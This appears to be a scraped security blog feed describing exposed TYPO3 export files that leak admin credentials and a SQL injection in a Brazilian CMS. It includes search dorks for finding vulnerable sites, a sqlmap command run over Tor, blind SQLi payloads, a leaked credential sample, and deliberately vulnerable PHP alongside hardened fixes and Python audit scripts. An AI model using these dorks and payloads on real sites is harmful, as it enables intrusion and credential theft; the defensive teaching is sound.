<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETEJq6ebE91dGqnufEgjUHbJSkMrQrSNxkkte-zNEAiTJ8BzKw8U5M5wHLSgcDc7QowkVvpC5DN44HuLnLkGVtdGOzNVBiNOPTqZCSRX_42uyfT3xwjf6wh7LVbn8-6dHdzZhgBqEhVhw/s1600/Captura+de+tela+de+2015-10-14+02%253A12%253A34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETEJq6ebE91dGqnufEgjUHbJSkMrQrSNxkkte-zNEAiTJ8BzKw8U5M5wHLSgcDc7QowkVvpC5DN44HuLnLkGVtdGOzNVBiNOPTqZCSRX_42uyfT3xwjf6wh7LVbn8-6dHdzZhgBqEhVhw/s640/Captura+de+tela+de+2015-10-14+02%253A12%253A34.png" width="640" /></a></div>
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">POC .T3D FILE:</span></b><br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/fileadmin/*.t3d</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/fileadmin/</span><span style="font-family: "courier new" , "courier" , monospace;">archives_site</span><span style="font-family: "courier new" , "courier" , monospace;">/*.t3d</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/subdir/fileadmin/</span><span style="font-family: "courier new" , "courier" , monospace;">*.t3d</span><br />
<b>Ex:</b><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d</span><br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Example file content:</span></b><br />
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace;">s:11:"admin_xxxx";s:5:"email";s:26:"admin@xxxx-autoxxxx.fr";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"admin@xxx-autopartage.fr";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1</span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Mass search using the <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a> SCANNER.</b>
</span></pre>
<pre style="word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">Download: </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre-wrap;"><a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></span></span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">Command:</span></b></pre>
<pre style="word-wrap: break-word;"><span style="color: red;"><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">php inurlbr.php --dork '</span><span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre-wrap;">/fileadmin/utopia*.t3d.xml</span></span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">' -s </span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">t3d.txt -t 2 -a '</span><span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre-wrap;"><username></span></span></span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;"><span style="color: red;">'</span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Np5y4IbrHIbNVkgHYrQyfouLeDIAcbg35V7aQBqx4_9mHisA_2yhcbLrIKjcGYQm7zPexzvVHAh5vnG2K94PODU9OxjQHgxGB_sb-RvsBEX0r7BSHNG0e80CtM7kwanCXGf0-VKk5yp/s1600/giphy+%25281%2529.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Np5y4IbrHIbNVkgHYrQyfouLeDIAcbg35V7aQBqx4_9mHisA_2yhcbLrIKjcGYQm7zPexzvVHAh5vnG2K94PODU9OxjQHgxGB_sb-RvsBEX0r7BSHNG0e80CtM7kwanCXGf0-VKk5yp/s320/giphy+%25281%2529.gif" width="320" /></a></div>
</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;"><b>Result:</b></span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">
</span><div class="separator" style="clear: both; font-family: 'Courier New', Courier, monospace; text-align: center; white-space: pre-wrap;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCPYzyznBnw8EC8CEdVFQLJiGjRpKtg3jFrBTXJ4Dyp2GjaOtDrZQsuykv6AQMxfcTYkeS97dIjDvqCFaB9CzZ_b9w0RhLIPanfo0eQSmLTr-lienN9G02Yg0Uta-h46aM-YwIRzohihsP/s1600/Captura+de+tela+de+2015-10-14+02%253A29%253A37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCPYzyznBnw8EC8CEdVFQLJiGjRpKtg3jFrBTXJ4Dyp2GjaOtDrZQsuykv6AQMxfcTYkeS97dIjDvqCFaB9CzZ_b9w0RhLIPanfo0eQSmLTr-lienN9G02Yg0Uta-h46aM-YwIRzohihsP/s640/Captura+de+tela+de+2015-10-14+02%253A29%253A37.png" width="640" /></a></div>
<span style="white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">
</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Solution?</b></span><span style="font-family: "courier new" , "courier" , monospace;">
<i>Upgrade the CMS and properly configure the file and folder permissions on your server.</i>
</span></span></pre>
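As an added example for the exposure described in this post (it is not TYPO3 code and not the blog's own), a small audit script walks a local web root for .t3d/.t3d.xml export files, records which of them sit under fileadmin/, and pulls out the serialized username/password records so an operator can remove or block them before a crawler indexes them; the sample tree and the export fragment are constructed placeholders in the same serialized shape the post shows.

```python
"""Audit a TYPO3 web root for export/backup files (.t3d, .t3d.xml) left readable.

Added example for this post. Anything below the web root is reachable over HTTP,
so every export file is reported; those under fileadmin/ are flagged because that
is where the post found them.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

EXPORT_SUFFIXES = (".t3d", ".t3d.xml")
# TYPO3 exports hold PHP-serialized records: s:8:"username";s:8:"adminxxx"; ...
CRED_RE = re.compile(r's:\d+:"(username|password)";s:\d+:"([^"]*)"')


def is_export_file(name: str) -> bool:
    """True for the two export extensions shown in the post."""
    return name.lower().endswith(EXPORT_SUFFIXES)


def under_fileadmin(rel_path: Path) -> bool:
    """True when any ancestor directory is named fileadmin (at any depth, as in the post)."""
    return "fileadmin" in rel_path.parts[:-1]


def credential_records(data: str) -> List[Tuple[str, str]]:
    """Return (key, value) pairs for username/password fields in serialized export data."""
    return CRED_RE.findall(data)


def audit_webroot(webroot: str) -> List[dict]:
    """Return one finding per export file below the web root, sorted by relative path."""
    root = Path(webroot)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_export_file(name):
                continue
            path = Path(dirpath) / name
            rel = path.relative_to(root)
            data = path.read_text(encoding="utf-8", errors="replace")
            findings.append({
                "path": rel.as_posix(),
                "in_fileadmin": under_fileadmin(rel),
                "credentials": credential_records(data),
            })
    return sorted(findings, key=lambda f: f["path"])


# Constructed export fragment; the hash is a placeholder, not a real credential.
SAMPLE_EXPORT = (
    'a:1:{s:8:"be_users";a:1:{i:1;a:2:{s:8:"username";s:8:"adminxxx";'
    's:8:"password";s:32:"0123456789abcdef0123456789abcdef";}}}'
)


def build_sample_webroot() -> str:
    """Create a temporary tree mimicking the layouts in the post; returns its path."""
    root = tempfile.mkdtemp(prefix="typo3-audit-")
    cases = {
        "fileadmin/utopia4cb2c07e326f4.t3d.xml": SAMPLE_EXPORT,
        "subdir/fileadmin/archives_site/utopia_autotao.t3d": SAMPLE_EXPORT,
        "typo3temp/utopia519e1b3d6c76b.t3d": SAMPLE_EXPORT,   # export outside fileadmin
        "fileadmin/user_upload/logo.png": "not an export",      # must be ignored
    }
    for rel, content in cases.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    for finding in audit_webroot(build_sample_webroot()):
        keys = [key for key, _ in finding["credentials"]]
        print(finding["path"], "fileadmin" if finding["in_fileadmin"] else "other", keys)
```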
InurlBR http://www.blogger.com/profile/12688503833321390298 noreply@blogger.com 3 tag:blogger.com,1999:blog-5670232360751087799.post-8634955833316333214 2015-09-30T21:32:00.000-03:00 2015-10-14T11:56:38.883-03:00 ( 0day ) - CMS Jourdan Design - SQL INJECTION Well, continuing my research on Brazilian ( <b>CMSs</b> ), I stumbled in my "<b>Googlings</b>" upon the CMS of the company<b> Jourdan Design</b>.<br />
It presents serious SQL injection flaws, via <b>POST</b> & <b>GET</b> requests.<br />
Since I found neither source code nor the pattern of other CMSs, I deduced that they use a priv8 application.<br />
<br />
Let's get to the facts....<br />
In a small and quick analysis it is possible to verify <b>MULTIPLE VULNERABILITIES</b>:<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>INFORMATION:</b></span><br />
<br />
<pre>[+] VENDOR: http://www.jourdandesign.com.br
[+] VULNERABLE VERSIONS: <i>(NOT IDENTIFIED)</i>
[+] FILE: VIA POST: newsletter_done.php, pesquisa_done.php
VIA GET : nossa_historia_texto.php
[+] DORK: "by Jourdan Design" "news_not_pk"
[+] REPORTED: 30/09/2015
</pre>
<br />
Ladies and gentlemen reading this humble article, I do not want to say that this is a big flaw<br />
that will affect millions of people ... because it will not; this "platform", or tangle of unfiltered code,<br />
affects at most its users/clients, but the main purpose is to show filters with PDO..<br />
and unprotected filters, and some good practices.<br />
<br />
( Every dev knows || should know ) that when systems go to production they must have their errors handled; at least they should, right (?!).<br />
Almost every application that gets compromised via <b>SQL - INJECTION</b> is compromised because its errors are not handled on the server side; many times they are owned by 'BOTS', yes, bots, which upon identifying that <b>SQL Syntax</b> error immediately start injecting commands to extract information.<br />
<br />
BUT DOES HANDLING MY APPLICATION'S ERRORS ALONE ALREADY MAKE ME SAFE?<br />
The answer is <b>NO!</b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvo1cHFYi04LRfK9YOtsGQPPqOe_Hkp1Sxx0NcchpZPTgcjxEzncTKHCtToSrNX9ZMX6xWBHh2im4bnfl1dy3yTsyFv34TLk0wAjyoevuZP0oBdGNi9y5K6HNTSicj46-0aFoZepeJShib/s1600/nao-me-diga-meme1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MAS SÓ TRATAR OS ERROS DA MINHA APLICAÇÃO JÁ ME DEIXA SEGURO ? A resposta é NÃO!" border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvo1cHFYi04LRfK9YOtsGQPPqOe_Hkp1Sxx0NcchpZPTgcjxEzncTKHCtToSrNX9ZMX6xWBHh2im4bnfl1dy3yTsyFv34TLk0wAjyoevuZP0oBdGNi9y5K6HNTSicj46-0aFoZepeJShib/s400/nao-me-diga-meme1.jpg" title="MAS SÓ TRATAR OS ERROS DA MINHA APLICAÇÃO JÁ ME DEIXA SEGURO ? A resposta é NÃO!" width="400" /></a></b></div>
<br />
<br />
Although this is basic information, small and large companies alike, including governments, still suffer from it.<br />
<br />
Let's get to the BUGS of <a href="http://www.jourdandesign.com.br/" target="_blank">Jourdandesign</a><br />
<i>I will demonstrate only one.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>FILE:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">newsletter_done.php</span><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">REQUEST POST:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">nome=bypass&email=bypass@aduneb.com.br&Submit3=cadastrar</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>POC:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.vul.com.br/newsletter_done.php?nome=bypass<b>+{SQL_INJECTION_BLIND}</b>&email=bypass@aduneb.com.br<b>+{SQL_INJECTION_BLIND}</b>&Submit3=cadastrar</span><br />
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">GENERATING AN ERROR BY PASSING MALICIOUS CHARACTERS</span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZiCpS0sv_q-paU2i7ChBkGwtDarwo9aJh1ANU7_uPsAXy4uPJtHW1zrx8Wxnf6NK8rnhhvgXlLuPbUO-Xsde4o-QzlbeURPfFj0wY05wj4tSe0BdatqdzYSvfS9zFoYTOfTQN3hGT5g9q/s1600/Captura+de+tela+de+2015-09-28+17%253A16%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="GERANDO ERRO PASSANDO CARACTERES MALICIOSOS" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZiCpS0sv_q-paU2i7ChBkGwtDarwo9aJh1ANU7_uPsAXy4uPJtHW1zrx8Wxnf6NK8rnhhvgXlLuPbUO-Xsde4o-QzlbeURPfFj0wY05wj4tSe0BdatqdzYSvfS9zFoYTOfTQN3hGT5g9q/s640/Captura+de+tela+de+2015-09-28+17%253A16%253A17.png" title="GERANDO ERRO PASSANDO CARACTERES MALICIOSOS" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>EXPOSED ERROR:</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jhVYsKcbiRh6N1_5sBfdWieSKpobfgcrVYYV3tqD9ijJpT6YBf7b77tc1c1fkH0-KpjdVIZmC7QEt76FFt8e1kUY0QElXk6Jb6GvsnH7X4hDLhov2J04-5Em62ky4rNg2pImDzhVy5e3/s1600/Captura+de+tela+de+2015-09-28+17%253A16%253A50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ERRO EXPOSTO:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jhVYsKcbiRh6N1_5sBfdWieSKpobfgcrVYYV3tqD9ijJpT6YBf7b77tc1c1fkH0-KpjdVIZmC7QEt76FFt8e1kUY0QElXk6Jb6GvsnH7X4hDLhov2J04-5Em62ky4rNg2pImDzhVy5e3/s640/Captura+de+tela+de+2015-09-28+17%253A16%253A50.png" title="ERRO EXPOSTO:" width="640" /></a></div>
<br />
From the fields passed we can see that these parameters belong to the "CMS" newsletter, but by manipulating those values outside the javascript validation we can bypass it.<br />
<b>Tip:</b> <i>always validate data on the server side, whether it comes from logged-in clients or not.</i><br />
<i>If the request is made by the user, do not trust the Request; filter it.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>EXPLOITATION VIA SQLMAP:</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>COMMAND:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">sqlmap -u 'http://www.vull.com.br/newsletter_done.php' --data "nome=bypass&email=123#2*@aduneb.com.br#1*&Submit3=cadastrar" -p nome --random-agent --level 3 --risk 2 --tor --tor-type=SOCKS5 --dbs --thread 5</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SCREENSHOT:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhob_CQqgnUuXHoNof7vwMpdeEJ9gwZ0KaaU3Nk3wNm9-cGURqLz__A2G4P1jY21V9vCEko4hhVtFDJaLfYkAJNOhCp1_ua7gBQ9H8NuqzJvtGxrjV-aeJ1QuuAakxT6KmWGPTvSFjRuxd/s1600/Captura+de+tela+de+2015-09-28+17%253A29%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="PRINT EXPLORAÇÃO VIA SQLMAP:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhob_CQqgnUuXHoNof7vwMpdeEJ9gwZ0KaaU3Nk3wNm9-cGURqLz__A2G4P1jY21V9vCEko4hhVtFDJaLfYkAJNOhCp1_ua7gBQ9H8NuqzJvtGxrjV-aeJ1QuuAakxT6KmWGPTvSFjRuxd/s640/Captura+de+tela+de+2015-09-28+17%253A29%253A08.png" title="PRINT EXPLORAÇÃO VIA SQLMAP:" width="640" /></a></div>
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>RETURN SQLMAP DEBUG PAYLOAD:</b></span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Parameter: #1* ((custom) POST)</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: boolean-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=-7840') OR 1946=1946#@aduneb.com.br#1&Submit3=cadastrar</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: AND/OR time-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=123#2') AND (SELECT * FROM (SELECT(SLEEP(10)))Vxmq)#@aduneb.com.br#1&Submit3=cadastrar</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Parameter: #2* ((custom) POST)</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: boolean-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=-1051') OR 5045=5045#&Submit3=cadastrar</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: AND/OR time-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=123#2@aduneb.com.br#1') AND (SELECT * FROM (SELECT(SLEEP(10)))tdlq)#&Submit3=cadastrar</span><br />
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">CODE:</span></b><br />
An example of what the code in <span style="font-family: 'Courier New', Courier, monospace;"><b>newsletter_done.php</b></span> probably looks like:<br />
<br />
<pre>&lt;?php
// Example of the VULNERABLE newsletter_done.php: kept intentionally unsafe
// to show the bug. Do not copy this pattern.
$servername = "localhost";
$username   = "username";
$password   = "password";
$dbname     = "myDB";

// Request values taken straight from $_POST, with no validation at all
$nome  = $_POST['nome'];
$email = $_POST['email'];

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

// User input interpolated directly into the SQL text: this is the injection point
$sql = "INSERT INTO newsletter (nome, email)
        VALUES ('{$nome}', '{$email}')";

if ($conn->query($sql) === TRUE) {
    echo "EMAIL CADASTRADO COM SUCESSO!";
} else {
    // Echoing the failed SQL and the MySQL error back to the client is what
    // makes error-based detection (and sqlmap's job) trivial
    echo "Error: " . $sql . "&lt;br&gt;" . $conn->error;
}
$conn->close();
?&gt;
</pre>
<br />
With no filtering whatsoever on the POST request, the values are assigned straight to the application's variables and concatenated into the SQL string, so anything the client sends becomes part of the query.<br />
<br />
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><b>NEVER DO THIS!</b></span></div>
<div style="text-align: center;">
<img src="http://i.giphy.com/Pe5919oNgXol2.gif" height="320" width="304" /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
</div>
<ol>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">USE PDO!</span></b></li>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">PDO IS LIFE, MAN!</span></b></li>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">USE FILTERS!</span></b></li>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">IT SAVES LIVES!</span></b></li>
</ol>
<br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
A simple example using PDO and filters:</div>
<div style="text-align: left;">
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">CODE:</span></b></div>
<div style="text-align: left;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></b></div>
<pre>&lt;?php
// Hardened version of newsletter_done.php: validate and filter the input,
// then insert it through a PDO prepared statement. The prepared statement is
// what actually stops SQL injection; the filters reject junk early and are
// defense in depth, not the primary control.
$servername = "localhost";
$username   = "username";
$password   = "password";
$dbname     = "myDB";

// VALIDATING THAT THE $_POST FIELDS EXIST
$nome  = is_set($_POST, 'nome')  ? $_POST['nome']  : exit('&lt;p&gt;Missing field: nome!&lt;/p&gt;');
$email = is_set($_POST, 'email') ? $_POST['email'] : exit('&lt;p&gt;Missing field: email!&lt;/p&gt;');

// FILTERING THE POST FIELDS
$nome = is_name($nome);
if ($nome === FALSE)   { exit('&lt;p&gt;Invalid NAME!&lt;/p&gt;'); }
if (!is_email($email)) { exit('&lt;p&gt;Invalid email!&lt;/p&gt;'); }

// OPENING THE CONNECTION
try {
    $dbh = new PDO("mysql:host={$servername};dbname={$dbname};charset=utf8mb4", $username, $password, array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // make execute() failures throw, so the catch below is reached
        PDO::ATTR_EMULATE_PREPARES => false,                  // real server-side prepares: values never touch the SQL text
    ));

    $stmt = $dbh->prepare("INSERT INTO newsletter (nome, email) VALUES (:nome, :email)");
    $stmt->bindParam(':nome',  $nome);
    $stmt->bindParam(':email', $email);
    $stmt->execute();

    $dbh = null;
} catch (PDOException $e) {
    // Generic message only: never echo $e->getMessage() or the SQL to the client
    print "&lt;p&gt;Error!: SQL/INSERT - 0001&lt;/p&gt;";
    die();
}
// CODE REF:
// http://php.net/manual/pt_BR/pdo.prepared-statements.php
// http://php.net/manual/en/pdo.prepare.php

// FUNCTION: CHECKS THAT A REQUEST FIELD EXISTS AND IS NOT EMPTY
// (takes the array and the key, so a missing index does not raise a notice)
function is_set(array $arr, $key) {
    return isset($arr[$key]) &amp;&amp; $arr[$key] !== '';
}
// CODE REF:
// http://php.net/manual/en/function.isset.php
// http://php.net/manual/en/function.empty.php

// FUNCTION: VALIDATES THAT THE VALUE IS AN E-MAIL ADDRESS
// Validate the value exactly as received; sanitizing it first would silently
// turn some invalid input into a valid address and store something the user never typed.
function is_email($email) {
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}
// CODE REF:
// http://php.net/manual/en/filter.filters.validate.php
// http://bobby-tables.com/php.html

// FUNCTION: FILTERS AND VALIDATES THE NAME
// "PARANOID MODEL": returns the cleaned name, or FALSE when it is rejected
function is_name($name) {
    // REJECT STRINGS CARRYING TYPICAL INJECTION FRAGMENTS.
    // A blacklist like this is easy to bypass and also rejects legitimate
    // names such as O'Brien; with prepared statements it adds nothing to SQL safety.
    foreach (array('0X', 'DROP', ';', '--', 'UNION', 'CONCAT(', 'TABLE_', 'INFORMATION_', "'", '"') as $value) {
        if (strstr(strtoupper($name), $value) !== false) {
            return FALSE;
        }
    }
    // STRIP HTML AND SLASHES (FILTER_SANITIZE_STRING is deprecated since PHP 8.1)
    $name = htmlspecialchars(stripslashes(strip_tags(trim($name))), ENT_QUOTES, 'UTF-8');
    return $name !== '' ? $name : FALSE;
}
?&gt;
</pre>
<br />
<br />
It is a small, simple piece of code that is considerably safer, following these tips:<br />
<br />
<br />
<ul>
<li>VALIDATE THAT THE REQUEST FIELDS EXIST</li>
<li>FILTER THE FIELDS</li>
<li>USE PDO PREPARED STATEMENTS FOR EVERY SELECT, UPDATE, DELETE AND INSERT</li>
<li>IF POSSIBLE, VALIDATE THE VARIABLE TYPE AND THE MAXIMUM FIELD LENGTH IN THE HTML INPUT AND IN JAVASCRIPT, BEFORE SENDING AN UNNECESSARY REQUEST TO THE SERVER (this saves round trips; it is not a security control, since the client can skip it)</li>
<li>MAIN RULE: DO NOT TRUST THE CLIENT.</li>
</ul>
<br />
<br />
<ul>
<li>LAST RULE<br />FOLLOW ALL THE RULES ABOVE.</li>
</ul>
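As an added example (not code from the original post), here is the same newsletter INSERT rebuilt in Python on SQLite, once the way the vulnerable <b>newsletter_done.php</b> builds it (string interpolation) and once with a parameterised statement, the equivalent of PDO <b>prepare</b>/<b>bindParam</b>. The table, the inputs and the injected e-mail value are constructed for this demonstration; the multi-row VALUES trick stands in for the MySQL-specific payloads sqlmap used above, because SQLite has neither the <b>#</b> comment nor SLEEP():<br />

```python
"""Added example (not from the original post): the newsletter INSERT on SQLite,
built unsafely (string interpolation, as in the vulnerable PHP) and safely
(parameterised statement, as with PDO prepare/bindParam). Schema, inputs and
the injected value are constructed for this demo."""
import sqlite3

SCHEMA = "CREATE TABLE newsletter (nome TEXT, email TEXT)"

# Constructed attacker input: closes the VALUES tuple and appends a second row
INJECTED_EMAIL = "a@example.com'), ('admin', 'attacker@evil.example"

# sqlmap's boolean-based payload from the post (MySQL syntax, '#' comment)
SQLMAP_BOOLEAN_PAYLOAD = "-1051') OR 5045=5045#"


def fresh_db():
    """In-memory database with the newsletter table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def insert_unsafe(conn, nome, email):
    """Same construction as the vulnerable PHP: values spliced into the SQL text."""
    sql = f"INSERT INTO newsletter (nome, email) VALUES ('{nome}', '{email}')"
    conn.execute(sql)
    return sql


def insert_safe(conn, nome, email):
    """Placeholders: the driver passes values separately, they are never parsed as SQL."""
    conn.execute("INSERT INTO newsletter (nome, email) VALUES (?, ?)", (nome, email))


def rows(conn):
    return conn.execute("SELECT nome, email FROM newsletter ORDER BY rowid").fetchall()


def demo_unsafe():
    """One form submission, two rows: the attacker chose the second one."""
    conn = fresh_db()
    insert_unsafe(conn, "bypass", INJECTED_EMAIL)
    return rows(conn)


def demo_safe():
    """Same input through a parameterised statement: stored literally as one row."""
    conn = fresh_db()
    insert_safe(conn, "bypass", INJECTED_EMAIL)
    return rows(conn)


def demo_error_leak():
    """The sqlmap payload breaks the statement. The vulnerable PHP echoed the SQL
    and the database error to the client; that message is what error-based
    detection keys on. Returns the error text, or None if nothing failed."""
    conn = fresh_db()
    try:
        insert_unsafe(conn, "bypass", SQLMAP_BOOLEAN_PAYLOAD)
    except sqlite3.OperationalError as e:
        return str(e)
    return None


if __name__ == "__main__":
    print("unsafe:", demo_unsafe())
    print("safe:  ", demo_safe())
    print("error: ", demo_error_leak())
```

Run it directly: the unsafe path inserts two rows from one submission, the safe path stores the whole string as a single e-mail value, and the sqlmap payload raises a syntax error that the original PHP would have printed to the browser.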
<br />
<br />
<br />InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com4tag:blogger.com,1999:blog-5670232360751087799.post-28802685662055755122015-09-15T21:57:00.000-03:002015-10-14T11:56:49.003-03:00( 0day ) IBOOKING CMS - SQL INJECTION and Mass Exploitation<div class="separator" style="clear: both; text-align: center;">
